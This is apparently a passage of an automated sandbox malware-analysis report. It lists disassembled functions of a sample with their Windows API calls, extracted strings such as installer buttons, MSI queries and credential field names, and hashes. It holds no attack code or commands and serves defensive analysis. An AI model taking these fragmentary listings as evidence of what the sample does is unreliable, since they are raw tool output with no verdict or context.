                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$Interlocked$Incrementlstrlen$Decrement
                                                                                                                • String ID: 0:R$alt$ctrl$keycode$shift
                                                                                                                • API String ID: 36383070-2511585862
                                                                                                                • Opcode ID: b70884661b55cc2d7b81174ba8f50059e744217bffcd78c1cbbb3a722b64ca41
                                                                                                                • Instruction ID: 76aa5a0cd1dc19bebe1d2a2a5deef0c92b4fbf5ac2c7ee51af8cfdb5c8aaeb48
                                                                                                                • Opcode Fuzzy Hash: b70884661b55cc2d7b81174ba8f50059e744217bffcd78c1cbbb3a722b64ca41
                                                                                                                • Instruction Fuzzy Hash: D0E1D539805248BDEB09FBA5D846FEE7BA89F15318F20401FF501761C2EF7C6B858669
                                                                                                                Function 0044039E Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 343COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004403A3
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • __ftol.LIBCMT ref: 00440435
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                • __ftol.LIBCMT ref: 0044045C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked__ftol$DecrementIncrementlstrlen
                                                                                                                • String ID: 0:R$P$PPassword$PServerAddress$PUserName$Password$UserName
                                                                                                                • API String ID: 439246406-3909543088
                                                                                                                • Opcode ID: 07bca6b5a83fba1956f643b9bd73657a45c9388a111a1786a1189b6ba1285219
                                                                                                                • Instruction ID: bd03b0adc0f9ea16d523466af6f3f46c9776e3ac3697456ec47dd83fc5c531b1
                                                                                                                • Opcode Fuzzy Hash: 07bca6b5a83fba1956f643b9bd73657a45c9388a111a1786a1189b6ba1285219
                                                                                                                • Instruction Fuzzy Hash: 73B17D75805619A9EB09FBA6DC42FEE7B689F26318F10005FF501B21C2EF7C1B46866D
                                                                                                                Function 004201E1 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004201E6
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 0042020C
                                                                                                                  • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                                                • __ftol.LIBCMT ref: 00420381
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • IsWindow.USER32(?), ref: 004203AA
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001), ref: 004203C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$DecrementInterlockedInvalidateRectWindow
                                                                                                                • String ID: Enabled$Selected$Sorted$Text$Visible
                                                                                                                • API String ID: 3448736364-2696731559
                                                                                                                • Opcode ID: 149af4aec8e82252b51daaf9a8c46e4ff84464dcf3dc9c1619b6064ec9e3169a
                                                                                                                • Instruction ID: 7eb0b97744bd8fdcfe71428d0a1babc3e647d09180e7fb14c7feff6e49657f8d
                                                                                                                • Opcode Fuzzy Hash: 149af4aec8e82252b51daaf9a8c46e4ff84464dcf3dc9c1619b6064ec9e3169a
                                                                                                                • Instruction Fuzzy Hash: 1051E5316095257ADA05B7269C42EEE329E9F46334F20070FF431B62E3EF6C564243AE
                                                                                                                Function 0042003F Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00420044
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420070
                                                                                                                  • Part of subcall function 004515F6: __EH_prolog.LIBCMT ref: 004515FB
                                                                                                                  • Part of subcall function 004515F6: IsWindow.USER32(?), ref: 00451629
                                                                                                                  • Part of subcall function 004515F6: SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0045164B
                                                                                                                  • Part of subcall function 004515F6: SendMessageA.USER32(?,00000149,00000000,00000000), ref: 00451662
                                                                                                                  • Part of subcall function 004515F6: SendMessageA.USER32(?,00000148,00000000,00000000), ref: 0045167F
                                                                                                                  • Part of subcall function 004519D9: SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004519FB
                                                                                                                • IsWindow.USER32(?), ref: 004200CD
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004200E4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$H_prolog$Window$__ftol
                                                                                                                • String ID: Enabled$ItemCount$Selected$Sorted$Text$Visible
                                                                                                                • API String ID: 4272088191-211786709
                                                                                                                • Opcode ID: f974b0529d35a33abd1e791975ba957fcacf6b0ae9d2213bbd83debd46b2a923
                                                                                                                • Instruction ID: 194c7facc02b451eb1ef1c94f618bb1664aefb20aab39796094a26b7080ab279
                                                                                                                • Opcode Fuzzy Hash: f974b0529d35a33abd1e791975ba957fcacf6b0ae9d2213bbd83debd46b2a923
                                                                                                                • Instruction Fuzzy Hash: 5D41B371901524BACB01BBA69C42EDF7A6DEF85388F04041FF411A2162DB3D5653C7BE
                                                                                                                Function 004606F1 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 123windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004606F6
                                                                                                                • IsWindow.USER32(?), ref: 0046072C
                                                                                                                • GetNextDlgTabItem.USER32(?,?,00000001), ref: 0046074B
                                                                                                                • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004607FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologItemMessageNextSendWindow
                                                                                                                • String ID: &$Checked$false$noD$tTQ$true
                                                                                                                • API String ID: 3580624722-1106302426
                                                                                                                • Opcode ID: dca2a365dddfc61ed5e354935dca3ac59a44743440ff9d5626e72be7573642af
                                                                                                                • Instruction ID: 28ff760f15f42cd65ef503e641e3190d86d982c4781f83b21768024c4cc5f26e
                                                                                                                • Opcode Fuzzy Hash: dca2a365dddfc61ed5e354935dca3ac59a44743440ff9d5626e72be7573642af
                                                                                                                • Instruction Fuzzy Hash: D341B030600701AFDB55EF75C884B6ABBA0FF04754F14812EF4159B292EBB8ED41CB99
                                                                                                                Function 004689D6 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 200COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004689DB
                                                                                                                • GetSystemMetrics.USER32(00000006), ref: 00468A73
                                                                                                                • GetSystemMetrics.USER32(00000006), ref: 00468AEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$H_prolog
                                                                                                                • String ID: IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT
                                                                                                                • API String ID: 2939012833-2679619293
                                                                                                                • Opcode ID: f80d64fba93162bef99e389bc0197450a3df3037497501e8d862b8afc100e3bf
                                                                                                                • Instruction ID: 612bf3bb3a1a5bad5035dd40488528eb03de75a8191c976b0f81d4a9463d381d
                                                                                                                • Opcode Fuzzy Hash: f80d64fba93162bef99e389bc0197450a3df3037497501e8d862b8afc100e3bf
                                                                                                                • Instruction Fuzzy Hash: 4F7140B1910219ABCF14DFA5DD56FEF7BB9AF44704F00412EF405B6282DB74A904CBAA
                                                                                                                Function 004688E5 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004688EA
                                                                                                                  • Part of subcall function 0045FDEB: __EH_prolog.LIBCMT ref: 0045FDF0
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: < Back$Cancel$Help$IDS_CTRL_BUTTON_BACK$IDS_CTRL_BUTTON_CANCEL$IDS_CTRL_BUTTON_HELP$IDS_CTRL_BUTTON_NEXT$Next >
                                                                                                                • API String ID: 3243491680-298686068
                                                                                                                • Opcode ID: 2c72c62cae1d5018aff026f11301bb40ff7173ace604c7562fd34bdc8b5b7b12
                                                                                                                • Instruction ID: 8c301571b7883f3645e14ba8901b0c362cf74ec3eff5d7f916d91cd58e861c36
                                                                                                                • Opcode Fuzzy Hash: 2c72c62cae1d5018aff026f11301bb40ff7173ace604c7562fd34bdc8b5b7b12
                                                                                                                • Instruction Fuzzy Hash: D42188B4724705B7DF08AB5AC917ADEBEB5AF85B24F10420EF011632D2CBB41B4485EB
                                                                                                                Function 004205ED Relevance: 15.2, APIs: 10, Instructions: 150windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420614
                                                                                                                • __ftol.LIBCMT ref: 00420626
                                                                                                                • IsWindow.USER32(?), ref: 0042065E
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420687
                                                                                                                • SendMessageA.USER32(?,00000144,?,00000000), ref: 004206B1
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004206CA
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 004206D6
                                                                                                                • SendMessageA.USER32(?,00000144,00000000,00000000), ref: 004206EB
                                                                                                                • IsWindow.USER32(?), ref: 0042074E
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001), ref: 0042076C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window__ftol$H_prologInvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1719125992-0
                                                                                                                • Opcode ID: 7cb3b3f9666ef157e19739827c140fd9d8d5d45e013193b0e25331d8bfe78057
                                                                                                                • Instruction ID: 2ffe84984871c3027cda14e9c8aa56fe3210c7d7d31b05157b291f12c7be0fd5
                                                                                                                • Opcode Fuzzy Hash: 7cb3b3f9666ef157e19739827c140fd9d8d5d45e013193b0e25331d8bfe78057
                                                                                                                • Instruction Fuzzy Hash: 0951FF70B00204AFDB10AF65DC81FAEB7F9EF84354F10416AF511AB2A2C775ED018B18
                                                                                                                Function 0043012E Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 213libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00430133
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetUserInfoA), ref: 00430190
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen$AddressLibraryLoadProc
                                                                                                                • String ID: 0:R$CompanyName$MsiGetUserInfoA$SerialNumber$UserInfoState$UserName
                                                                                                                • API String ID: 730962311-3475145488
                                                                                                                • Opcode ID: 7f0b15c74f45c1c9e5d229d7ea6c56fc69b28669e9096641a4cc24df1d0bf3d7
                                                                                                                • Instruction ID: f48231176893b2492514ed4d13078f1dd229c1fbd4f959c36a3ee04a97692080
                                                                                                                • Opcode Fuzzy Hash: 7f0b15c74f45c1c9e5d229d7ea6c56fc69b28669e9096641a4cc24df1d0bf3d7
                                                                                                                • Instruction Fuzzy Hash: DD716C75C00119BACF01BBE2DC82EEEBB78AF15358F14402FF50172152DB385A86DB69
                                                                                                                Function 00430546 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 177libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043054B
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00430574
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                • __ftol.LIBCMT ref: 0043059D
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                                                • GetProcAddress.KERNEL32(00000000,MsiGetFeatureInfoA), ref: 004305CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$AddressLibraryLoadProclstrlen
                                                                                                                • String ID: 0:R$Description$MsiGetFeatureInfoA$Title
                                                                                                                • API String ID: 3912782950-3107902656
                                                                                                                • Opcode ID: 60b113825be5c55a71079dc5045074bde9deb5e34e198a30927c29871f399671
                                                                                                                • Instruction ID: e824c5e08e4226fd8a53abed4c9ed5df991b82728ac6f6a208ea35d8e8fdfac0
                                                                                                                • Opcode Fuzzy Hash: 60b113825be5c55a71079dc5045074bde9deb5e34e198a30927c29871f399671
                                                                                                                • Instruction Fuzzy Hash: 05518D76800219AACF01FBE5DC82EEEBB78EF19308F14412FF50172192DB385B459B69
                                                                                                                Function 00444A05 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00444A0A
                                                                                                                • GetFileAttributesA.KERNEL32(?,00510870,?,?,?,?,00000000), ref: 00444A23
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,00000000), ref: 00444A86
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,00000000), ref: 00444A97
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00444B16
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00444B1F
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004451DB: __EH_prolog.LIBCMT ref: 004451E0
                                                                                                                  • Part of subcall function 004451DB: RemoveDirectoryA.KERNEL32(?,00000000,?,00000000,0000005C,?,00000000,?,?,?,?,00000000), ref: 00445299
                                                                                                                Strings
                                                                                                                • Failed to set source file attribute to normal durign move, xrefs: 00444B51
                                                                                                                • Failed to delete file after copy, xrefs: 00444B2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$DeleteH_prolog$DirectoryIncrementInterlockedRemove
                                                                                                                • String ID: Failed to delete file after copy$Failed to set source file attribute to normal durign move
                                                                                                                • API String ID: 460680484-3602874778
                                                                                                                • Opcode ID: d40d654c7fae012e60810f84a58d5e0f736b23fdc4226d12b632200870eda356
                                                                                                                • Instruction ID: d70e420914a337e0fe442d1616408a22ebf8e0ec7083ef759637baa88477e379
                                                                                                                • Opcode Fuzzy Hash: d40d654c7fae012e60810f84a58d5e0f736b23fdc4226d12b632200870eda356
                                                                                                                • Instruction Fuzzy Hash: 3841B574A00705ABEF14EF65C846BAE7BA5EF84354F10411FF506A7281CB78EB418B9A
                                                                                                                Function 004ACAC1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004ACAC6
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004ACB6B
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004ACBEC
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004ACBFB
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004ACC0A
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004ACC14
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004ACC25
                                                                                                                  • Part of subcall function 004AC2EA: __EH_prolog.LIBCMT ref: 004AC2EF
                                                                                                                  • Part of subcall function 004AC2EA: VariantClear.OLEAUT32(00000007), ref: 004AC843
                                                                                                                  • Part of subcall function 004AC2EA: VariantClear.OLEAUT32(?), ref: 004ACA50
                                                                                                                  • Part of subcall function 004A704F: VariantCopy.OLEAUT32(?,?), ref: 004A7057
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
